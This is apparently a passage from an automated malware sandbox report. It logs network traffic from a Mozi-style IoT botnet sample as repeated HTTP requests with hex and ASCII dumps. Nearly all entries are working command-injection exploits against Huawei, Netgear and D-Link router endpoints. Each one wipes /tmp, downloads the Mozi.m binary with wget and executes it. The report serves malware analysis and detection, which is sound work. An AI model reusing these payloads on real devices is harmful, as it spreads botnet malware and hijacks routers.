xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 168.184.43.22:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 168.184.43.22:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 168.184.43.22:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 157.245.223.131:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 81.7.8.12:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 166.88.243.237:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 18.228.54.139:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 23.40.37.31:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping 